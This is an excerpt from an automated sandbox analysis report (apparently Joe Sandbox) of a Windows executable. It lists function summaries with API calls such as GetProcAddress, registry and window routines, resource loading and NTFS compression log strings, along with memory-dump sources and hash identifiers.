                                                                            Function 0042D7CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004524DE,00000000,00452581,?,?,00000000,00000000,00000000,00000000,00000000,?,0045284D,00000000), ref: 0042D7E6
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D7EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                            • API String ID: 1646373207-4063490227
                                                                            • Opcode ID: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                            • Instruction ID: 4db8f333c9a0d948aa4d288d669557f69a64c6eaa67e0ad6c3f7b03414b73d9c
                                                                            • Opcode Fuzzy Hash: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                            • Instruction Fuzzy Hash: 23E04F61B44B1112D7107ABA9C83A5B10898B88724FA0843B79A5E72C7EDBCD94A1A7D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044EFD8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                            • API String ID: 1646373207-597752486
                                                                            • Opcode ID: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                            • Instruction ID: d5e9afbdc33ce2732c9423c566c922af1deae432a4d89253bf7da83917605eba
                                                                            • Opcode Fuzzy Hash: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                            • Instruction Fuzzy Hash: 8DE0ECE0A42344AEFB10BBF6E942B1B2A90E7D571DB10007BB2006A593CB7C040A8A1E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0049273C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                            • API String ID: 1646373207-834958232
                                                                            • Opcode ID: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                            • Instruction ID: eaa947335cb6f520d9ee4e24e6959d85bb97eec5577cdd685d5abce296b2953a
                                                                            • Opcode Fuzzy Hash: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                            • Instruction Fuzzy Hash: 31B09280281702748C1032F20E46E1B4888488072571404B73400B10C2CDEC880528AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00460AF4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044AEEC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                            • API String ID: 2238633743-2683653824
                                                                            • Opcode ID: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                            • Instruction ID: 1dc59214256150821f64c4a5b3e010dcdd688bc926fb1e8d07287d1f160dc46b
                                                                            • Opcode Fuzzy Hash: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                            • Instruction Fuzzy Hash: EFB09290B80700A19E00B7F25883D2B140C8580F1D720847B7010791DBEA7C500099AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00413C68 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00413CB6
                                                                            • GetDesktopWindow.USER32 ref: 00413D6E
                                                                              • Part of subcall function 00418E30: 6F5AC6F0.COMCTL32(?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E4C
                                                                              • Part of subcall function 00418E30: ShowCursor.USER32(00000001,?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E69
                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413A63,00000000,00413A76), ref: 00413DAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CursorDesktopWindow$Show
                                                                            • String ID:
                                                                            • API String ID: 2074268717-0
                                                                            • Opcode ID: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                            • Instruction ID: f419cdb22dffc734eda11f614feaf6954746e02452764f6a113fc2dd2abbdfc2
                                                                            • Opcode Fuzzy Hash: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                            • Instruction Fuzzy Hash: C7419275600110AFC700EFB9E984F4677E0AB95315B1684BBE104CB365DA38ED82CF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004089BC Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 004089DD
                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408A4C
                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408AE7
                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B26
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString$FileMessageModuleName
                                                                            • String ID:
                                                                            • API String ID: 704749118-0
                                                                            • Opcode ID: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
                                                                            • Instruction ID: 14e0b5c6cd5b97c86ff82054d5328c9cf2b7980ad66a2a36783bbd85928cae88
                                                                            • Opcode Fuzzy Hash: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
                                                                            • Instruction Fuzzy Hash: 6E3143706083809FD330EB65C945B9B77E89B8A304F40483FB6C8E72D1DB7999058767
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044E158 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E1A1
                                                                              • Part of subcall function 0044C7E4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C816
                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E225
                                                                              • Part of subcall function 0042BB24: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BB38
                                                                            • IsRectEmpty.USER32(?), ref: 0044E1E7
                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E20A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                            • String ID:
                                                                            • API String ID: 855768636-0
                                                                            • Opcode ID: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                            • Instruction ID: 5406ccee5fb56c270110fdf5510288933eb71161ddc8a876bede12871bf79798
                                                                            • Opcode Fuzzy Hash: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                            • Instruction Fuzzy Hash: 6E114D71B4031027E210BA7E9C86B5B66CDAB88749F04493FB605EB383DEB9DC058299
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0048F85C Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 0048F8C0
                                                                            • OffsetRect.USER32(?,00000000,?), ref: 0048F8DB
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 0048F8F5
                                                                            • OffsetRect.USER32(?,00000000,?), ref: 0048F910
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: OffsetRect
                                                                            • String ID:
                                                                            • API String ID: 177026234-0
                                                                            • Opcode ID: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                            • Instruction ID: ce36c56c1c582fdda7e72a0fface693b427ee6f0177311c7c28b849f91f6b588
                                                                            • Opcode Fuzzy Hash: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                            • Instruction Fuzzy Hash: 0F217CB6700201ABD300EE69CC85E5BB7DEEBD4344F14CA3AF954C7249D738E94887A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00417188 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 004171D0
                                                                            • SetCursor.USER32(00000000), ref: 00417213
                                                                            • GetLastActivePopup.USER32(?), ref: 0041723D
                                                                            • GetForegroundWindow.USER32(?), ref: 00417244
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                            • String ID:
                                                                            • API String ID: 1959210111-0
                                                                            • Opcode ID: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                            • Instruction ID: 088d0700f5649383027441de99f76d51f9d962fb002c63a2b2ca12876e25bed5
                                                                            • Opcode Fuzzy Hash: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                            • Instruction Fuzzy Hash: 192183713086018ACB20ABA9D889AD733F1AF85714F0545ABF8589B792D73DDC82CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0048F514 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MulDiv.KERNEL32(8B500000,00000008,?), ref: 0048F529
                                                                            • MulDiv.KERNEL32(50142444,00000008,?), ref: 0048F53D
                                                                            • MulDiv.KERNEL32(F76037E8,00000008,?), ref: 0048F551
                                                                            • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048F56F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                            • Instruction ID: 6f2f5d3731a38f560a61ba406435f1238513cd740096e42b36e3bab7bd81765c
                                                                            • Opcode Fuzzy Hash: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                            • Instruction Fuzzy Hash: AA112172604204BBCB40EEADC8C4D9B77ECEF4D360B24416AF918DB246D634ED408BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041F3F0 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassInfoA.USER32(00400000,0041F3E0,?), ref: 0041F411
                                                                            • UnregisterClassA.USER32(0041F3E0,00400000), ref: 0041F43A
                                                                            • RegisterClassA.USER32(00493598), ref: 0041F444
                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F47F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                            • String ID:
                                                                            • API String ID: 4025006896-0
                                                                            • Opcode ID: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                            • Instruction ID: ba8a097de1154e85499311c45b2324022c4db67c4a949dbf0f11183773784737
                                                                            • Opcode Fuzzy Hash: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                            • Instruction Fuzzy Hash: 720152712401047BCB20EF68ED81E9B37ACA76D314B11413BBA05E72E1D635DD165BAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D170 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D187
                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C,0000000A,REGDLL_EXE), ref: 0040D1A1
                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C), ref: 0040D1BB
                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?), ref: 0040D1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                            • Instruction ID: a2e4909c1946fcd89949086e6ecb513f2c22862e5b7fa6f76d970aa484769738
                                                                            • Opcode Fuzzy Hash: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                            • Instruction Fuzzy Hash: BEF0FF726056046F9754EE9DA881D5B76ECDE48264320416AF908EB246DE38DD118B78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401548 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,00494450,?,?,?,004018B4), ref: 00401566
                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,00494450,?,?,?,004018B4), ref: 0040158B
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,00494450,?,?,?,004018B4), ref: 004015B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Alloc$Free
                                                                            • String ID: ,#v
                                                                            • API String ID: 3668210933-3386492414
                                                                            • Opcode ID: effaea0c309239f47e4a30e9269409fffac43427cb9d7665a241d21997c4c65f
                                                                            • Instruction ID: 688e54e40afa48e252ad409736864ed84c60ecfa1e9a5b11fd7d95e45b94ba24
                                                                            • Opcode Fuzzy Hash: effaea0c309239f47e4a30e9269409fffac43427cb9d7665a241d21997c4c65f
                                                                            • Instruction Fuzzy Hash: 30F0C2B1640320AAEB315A294C85F133AD8DBC5794F1040B6BE09FF3DAD6B8980082AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00454504 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000,00459AF9), ref: 00454540
                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000), ref: 00454549
                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00454556
                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045456A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                            • String ID:
                                                                            • API String ID: 4283692357-0
                                                                            • Opcode ID: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                            • Instruction ID: 1eb0840f44da6d39683793e989569f75594476954d085f3704b84519527e0fd3
                                                                            • Opcode Fuzzy Hash: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                            • Instruction Fuzzy Hash: B9F054B574535037EA10B6B69C47F1B228C8F94749F10483BB600EF2C3D97CD904962D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046B6D8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046B729
                                                                            Strings
                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046B70F
                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046B73A
                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046B6F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                            • API String ID: 1452528299-1392080489
                                                                            • Opcode ID: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                            • Instruction ID: 8a2dc4ed195109a8471c1236a5c58557194bf09444f2f11eb0036fe1721b7234
                                                                            • Opcode Fuzzy Hash: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                            • Instruction Fuzzy Hash: 6E014431D0824866CF04D7ED90512EDBBF4DF49305F54C5AFA454DB242EBB9094987DB
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046BFC8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0046C019
                                                                            Strings
                                                                            • Unsetting NTFS compression on file: %s, xrefs: 0046BFFF
                                                                            • Setting NTFS compression on file: %s, xrefs: 0046BFE7
